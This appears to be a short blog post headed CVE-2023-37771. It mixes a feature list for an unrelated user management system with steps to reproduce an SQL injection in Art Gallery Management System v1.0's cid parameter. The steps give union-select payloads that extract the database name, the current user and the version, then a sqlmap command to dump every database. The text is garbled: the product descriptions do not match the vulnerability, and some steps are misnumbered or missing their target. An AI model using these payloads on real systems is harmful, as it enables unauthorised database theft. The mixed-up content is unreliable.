CVE-2023-37771 User Registration & Login and User Management System

User Module

In user module, user can register yourself. After Registration user can log in with own email id and password.
if the user forgot their own password then user can request for password using their own email id.

User Registration
User Login
Forgot Password

Note: For Forgot password , you have provide your gmail credetails in password-recovery.php. After that email function will work on your localhost.

Art Gallery Management System v1.0 contains a SQL injection vulnerability via the cid parameter at /agms/product.php.

Configurations :


Steps Of Reproduce - 

1. Go to the Sculptures by navigating the "ART TYPE" option in the navigation bar.

 2. Here on this page in "cid" parameter by inserting single quotes to break the query we know that the "cid" parameter is vulnerable to SQL injection.'&&artname=Sculptures

 3. Now join query'--+&&artname=Sculptures

 3. Now run "order by " query to know the columns' order by 6 --+&&artname=Sculptures

 4.Now By inserting the payload in the "cid" parameter we got the username, database, and database version.' union all select 1,2,3,database(),5,6 --+&&artname=Sculptures' union all select 1,2,3,current_user(),5,6 --+&&artname=Sculptures' union all select 1,2,3,version(),5,6 --+&&artname=Sculptures

 5. Now dump all the database by using sqlmap:

 sqlmap -u --dump-all --batch

Admin Panel

Admin can manage all registered users. Admin can update the user information and delete the user.
Admin can change own password

Admin Login
Manage users
Edit user information
Change Password(admin)

No comments:

Post a Comment